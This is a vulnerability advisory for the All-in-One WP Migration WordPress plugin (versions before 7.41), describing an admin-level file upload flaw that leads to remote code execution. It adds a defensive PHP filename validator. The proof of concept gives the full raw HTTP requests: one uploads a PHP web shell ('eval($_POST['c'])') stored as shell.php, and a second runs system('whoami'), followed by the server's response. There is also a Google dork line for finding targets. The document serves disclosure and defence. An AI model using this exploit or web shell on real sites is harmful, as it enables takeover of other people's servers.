WordPress Plugin Vulnerabilities
All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE
Description
The plugin does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.
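The root cause stated above is a missing check on the name an uploaded archive is stored under. The following PHP is an added example written for this page, not code from the All-in-One WP Migration plugin or its authors: it shows a strict allowlist check that an import handler can apply to the "storage" and "archive" parameters before anything is written under the plugin's storage directory. The function names, the storage root constant and the sample inputs are assumptions made for the example.

```php
<?php
// Added example, not the plugin's code. Demonstrates the check the advisory
// says is missing: the name an uploaded archive is saved under must be a plain
// *.wpress file name, never a script. All names below are assumptions.

declare(strict_types=1);

// Assumed storage root; the real plugin keeps its own directory layout.
const EXAMPLE_STORAGE_ROOT = '/var/www/html/wp-content/plugins/all-in-one-wp-migration/storage';

/**
 * Validate the "storage" sub-directory name. Only a single path component
 * made of safe characters is accepted, so "../", "x/y" and "\0" are rejected.
 */
function example_validate_storage(string $storage): ?string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $storage) === 1 ? $storage : null;
}

/**
 * Validate the "archive" file name. The allowlist is deliberately strict:
 * exactly one dot, followed by the migration archive extension. This rejects
 * "shell.php", "shell.php.wpress", "shell.wpress.php", path separators,
 * null bytes and anything a web server might hand to a script handler.
 */
function example_validate_archive(string $archive): ?string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,128}\.wpress\z/i', $archive) === 1 ? $archive : null;
}

/**
 * Resolve the destination path for an upload, or return null if either
 * component fails validation. Because both validators only accept a single
 * safe path component, the result is guaranteed to stay under $root.
 */
function example_resolve_destination(string $storage, string $archive, string $root = EXAMPLE_STORAGE_ROOT): ?string
{
    $storage = example_validate_storage($storage);
    $archive = example_validate_archive($archive);
    if ($storage === null || $archive === null) {
        return null;
    }
    return $root . DIRECTORY_SEPARATOR . $storage . DIRECTORY_SEPARATOR . $archive;
}

/**
 * Minimal import handler shape (assumed, not the plugin's): the client's own
 * upload file name is validated with the same rule as the "archive" field, so
 * neither field can smuggle a script name into the storage directory.
 */
function example_handle_import(array $params, array $file): array
{
    if (example_validate_archive((string)($file['name'] ?? '')) === null) {
        return ['ok' => false, 'error' => 'upload file name rejected'];
    }
    $dest = example_resolve_destination((string)($params['storage'] ?? ''), (string)($params['archive'] ?? ''));
    if ($dest === null) {
        return ['ok' => false, 'error' => 'storage or archive name rejected'];
    }
    // A real handler would move_uploaded_file($file['tmp_name'], $dest) here.
    return ['ok' => true, 'path' => $dest];
}

// Constructed sample requests. The first mirrors the parameter values shown in
// the proof of concept on this page; the last is a legitimate import.
$samples = [
    ['params' => ['storage' => 'shell',  'archive' => 'shell.php'],          'file' => ['name' => 'shell.wpress']],
    ['params' => ['storage' => 'shell',  'archive' => 'shell.php.wpress'],   'file' => ['name' => 'shell.wpress']],
    ['params' => ['storage' => '../../', 'archive' => 'site.wpress'],        'file' => ['name' => 'site.wpress']],
    ['params' => ['storage' => 'a1b2c3', 'archive' => 'site-backup.wpress'], 'file' => ['name' => 'site-backup.wpress']],
];

foreach ($samples as $s) {
    $result = example_handle_import($s['params'], $s['file']);
    printf("%-8s %-20s -> %s\n",
        $s['params']['storage'],
        $s['params']['archive'],
        $result['ok'] ? $result['path'] : 'REJECTED (' . $result['error'] . ')');
}
```

Run with `php example.php`; only the last sample resolves to a path, the three others are rejected. The name check is the fix for the flaw this page describes; as defence in depth, the web server should also be configured so that nothing under the plugin's storage directory is ever passed to a script handler, so that a loosened validator does not immediately become code execution.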
Proof of Concept
To reproduce:

- Log in, then open the All-in-One WP Migration import page to use the "import from file" function.
- Intercept the wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 request.
- Change the parameters "upload-file", "storage" and "archive". Insert malicious PHP code into "upload-file". Submit the request.
- Access the following URL to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive]

# Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution
# Google Dork: inurl:/wp-admin/admin-ajax.php
# Date: 23/12/2020
# Exploit Author: YICHENGLIU_chenfeng lab
# Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/
# Version: All-in-One WP Migration <=7.38
# Tested on: windows 10(x64)
# data in http request :

POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1
Host: 192.168.9.240
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797
Content-Length: 740
Origin: http://192.168.9.240
Connection: close
Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799

-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="upload-file"; filename="shell.wpress"
Content-Type: application/octet-stream

<?php eval($_POST['c']);
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="priority"

5
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="secret_key"

7wD1bP6YC4xB
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="storage"

shell
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="archive"

shell.php
-----------------------------3937767834299093780715813797--

########################## execute shell ##########################

POST /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/shell/shell.php HTTP/1.1
Host: 192.168.9.240
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

c=system('whoami');

########################### Execute response ###########################

HTTP/1.1 200 OK
Date: Fri, 19 Mar 2021 09:00:56 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.27
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1124

desktop-psag0ka\gongfang-9
Miscellaneous
Original Researcher
YICHENG LIU-ZTE CHENFENG lab
Submitter
YICHENG LIU_chenfeng lab
Verified
Yes
Timeline
Publicly Published
2022-02-07
Added
2022-02-07
Last Updated
2022-04-13